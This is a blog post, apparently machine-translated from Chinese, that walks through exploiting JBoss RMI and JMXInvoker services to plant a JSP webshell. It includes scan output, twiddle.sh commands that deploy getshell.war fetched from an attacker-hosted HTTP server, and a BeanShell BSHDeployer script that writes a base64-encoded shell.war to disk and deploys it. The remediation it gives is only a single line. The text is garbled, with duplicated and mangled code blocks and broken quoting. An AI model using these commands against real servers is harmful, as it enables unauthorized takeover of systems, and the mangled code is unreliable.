Friday, December 30, 2016

JBoss remote method invocation exploit Xiangjie

InnoCurrent Services - Get Paid to Visits Sites and Complete Surveys
The morning open micro-blog see empty heart of a prodigal God Jboss vulnerability to the article, I look over there the rookie is still very difficult, so check the data, writing this article, record.
The deployment of web applications on the JBoss server, there are many different ways, such as: JMX Console, Remote Method Invocation (RMI), JMXInvokerServlet, HttpAdapter etc..
This paper is mainly about RMI remote method invocation vulnerability, the deployment of several other methods such as JMX Console, there is a loophole, mainly to see the JBoss server configuration is correct and rigorous.Before there is an article about JMX Console exploits. Interested in the station search, okay:
Metasploit has a lot of modules for different JBOSS vulnerabilities, including jboss_vulnscan module, path: auxiliary/scanner/http/jboss_vulnscan, through this module can be JBoss server Vulnerability scanning, can detect whether there are 444410981099 open ports. Of course, you can also batch scan of a network is open 10991098 or 4444 port Nmap.The followimg:
1
2
3
4
5
6
7
8
9
[+] 192.168.0.35:443 /invoker/JMXInvokerServlet does not require authentication (200)
[*] 192.168.0.35:443 Checking services...
[*] 192.168.0.35:443 Naming Service tcp/1098: open
[*] 192.168.0.35:443 Naming Service tcp/1099: open
[*] 192.168.0.35:443 RMI invoker tcp/4444: open


The explanation of JNDI to Baidu.
In order to interact with the remote target JBoss server, need to be installed locally (such as: JBoss Jboss AS - 4.2.3.GA), using the bin directory under the twiddle and Jboss interact with twiddle.sh in Linux, the use of twiddle.bat in windows, as follows:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
data-src="$ sh jboss-4.2.3.GA/bin/twiddle.sh -h
A JMX client to ’twiddle’ with a remote JBoss server.
usage: twiddle.sh [options] <command> [command_arguments]
options:
 -h, --help                   Show this help message
 --help-commands          Show a list of commands
-H=<command>                 Show command specific help
-c=command.properties            Specify the command.properties file to use
-D<name>[=<value>]               Set a system property
--                               Stop procession options
-s, --server=<url>               The JNDI URL of the remote server
-a, --adapter=<name>             The JNDI name of the RMI adapter to user
-u, --user=<name>                Specify the username for authentication
-p, --password=<name>            Specify the password for authentication
-q, --quiet                      Be somewhat more quiet">Jboss-4.2.3.GA/bin/twiddle.sh -h
A JMX client $sh to with 'twiddle' a remote JBoss server.
usage: twiddle.sh [options] <command> [command_arguments]
options:
-h, --help Show this help message
--help-commands Show a list of commands
-H=<command> Show command specific help
-c=command.properties Specify the command.properties file to use
-D<name>[=<value>] Set a system property
-- Stop procession options
-s, --server=<url> The JNDI URL of the remote server
-a, --adapter=<name> The JNDI name of the RMI adapter to user
-u, --user=<name> Specify the username for authentication
-p, --password=<name> Specify the password for authentication
-q, --quiet Be somewhat more quiet
The remote target system to obtain information of the JBoss server with the following command:
?
1
2
3
4
5
6
7
8
9
data-src="root@bt:/pentest/web/jboss/jboss-4.2.1.GA/bin# ./twiddle.sh -s 192.168.0.35 get "jboss.system:type=ServerInfo"
HostAddress=192.168.0.35
......
JavaVersion=1.5.0_13
MaxMemory=266600448">Root@bt:/pentest/web/jboss/jboss-4.2.1.GA/bin#./twiddle.sh -s 192.168.0.35 get "jboss.system:type=ServerInfo"
HostAddress=192.168.0.35
...
JavaVersion=1.5.0_13
MaxMemory=266600448...
In order to get a higher authority, the JBoss server can be deployed in our webshell, create a war file, you can use Myeclipse to build a webshell containing war, as follows:
1, open the Myeclipse Web project
2, the JSP in the WebRoot directory
3, export the project as a war file

After the construction of good webshell containing war, twiddle can use the War deployment target JBoss server, first need to put war on a web server, you can use twistd to quickly build a web, as follows:
?
1
2
3
4
5
6
7
8
9
data-src="root@bt:/pentest/web/jboss/fns# ls
getshell.war
root@bt:/pentest/web/jboss/fns# twistd -n --path=. --port=80">Root@bt:/pentest/web/jboss/fns# ls
getshell.war
root@bt:/pentest/web/jboss/fns# twistd -n --path=. --port=80
The deployment of war to the Jboss server, the following command:
?
1
data-src="root@bt:/pentest/web/jboss/jboss-4.2.1.GA/bin# ./twiddle.sh -s 192.168.0.35 invoke "jboss.system:service=MainDeployer" deploy http://10.0.1.50/getshell.war">Root@bt:/pentest/web/jboss/jboss-4.2.1.GA/bin#./twiddle.sh -s 192.168.0.35 invoke "jboss.system:service=MainDeployer deploy http://10.0.1.50/getshell.war"
After the execution of our webshell will be deployed on the JBoss server, the path for:
Http://192.168.0.35/getshell/customize.jsp
The above is the use of a RMI remote method invocation vulnerability of the Jboss server, the above process is a prerequisite, the most important is the Jboss server needs to allow access to the remote HTTP server, otherwise there is no way to use RMI to deploy war to remote JBOSS server.
However, in many configurations, the firewall does not allow the JBoss server to send a connection request, if this is the case with firewall, you can use the BSHDeployer to execute arbitrary on the target Jboss server Beanshell to deploy webshell.
BeanShell is a run on the JRE script language, the language supports the syntax of Java routine. You can quickly finish, and do not need to compile, BSHDeployer JBoss server can be deployed in the BeanShell script, it will be performed automatically after installation. The specific steps are as follows:
1, according to the method mentioned above, create a good jspshell containing shell.war;
2, represented by the base64 command to generate shell.war Linux under the base64 command, as follows:
?
1
data-src="root@bt:~#base64 -w 0 shell.war>>shell.war.base64">Root@bt:~#base64 -w 0 shell.war>>shell.war.base64
3, create a BeanShell script, create a TXT document, without any newline, preserve the following to the txt:
?
1
data-src="import java.io.FileOutputStream; import sun.misc.BASE64Decoder; String val="shell.war的base64表示"; BASE64Decoder decoder = new BASE64Decoder(); byte[] byteval=decoder.decodeBuffer(val); FileOutputStream fs = new FileOutputStream("/temp/shell.war"); fs,write(byteval); fs.close();">Import java.io.FileOutputStream; import sun.misc.BASE64Decoder; String val= shell.war; BASE64Decoder decoder Base64 said "new = BASE64Decoder (byte[]); byteval=decoder.decodeBuffer (VAL); FileOutputStream FS = new FileOutputStream (" /temp/shell.war "); FS write (byteval); (fs.close);
The Val variable is the shell.war file Base64 said that if the target Jboss server is windows the directory changes such as: C:\WINDOWS\TEMP\shell.war, TXT will be renamed.Bsh file:
4, the use of the above bin/twiddle.sh tool will create a local.Bsh file to the remote JBoss server, the following command:
?
1
data-src="$ ./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.deployer:service=BSHDeployer createScriptDeployment "‘cat deployer.bsh‘" deployer.bsh">-s 192.168.0.35 invoke jboss.deployer:service=BSHDeployer createScriptDeployment $./jboss-4.2.3.GA/bin/twiddle.sh "cat" deployer.bsh "deployer.bsh"
After the completion of the command is executed on the remote Jboss server will generate shell.war directory for /temp/shell.war
5, then twiddle.sh will continue to use Jboss on the server shell.war deployment, the following command:
?
1
data-src="$ ./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy "/temp/shell.war"">./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy $/temp/shell.war"
The target Jboss server for windows if the command is as follows:
?
1
data-src="$./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy "file:C:/WINDOWS/TEMP/shell.war"">$./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy file:C:/WINDOWS/TEMP/shell.war ""
It will deploy shell.war on the target JBoss server, which is our jspshell, then you know!
Jboss remote method invocation vulnerability fixes cited article empty heart prodigal aunt:
To remove the invoker, and then 1099 off it.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)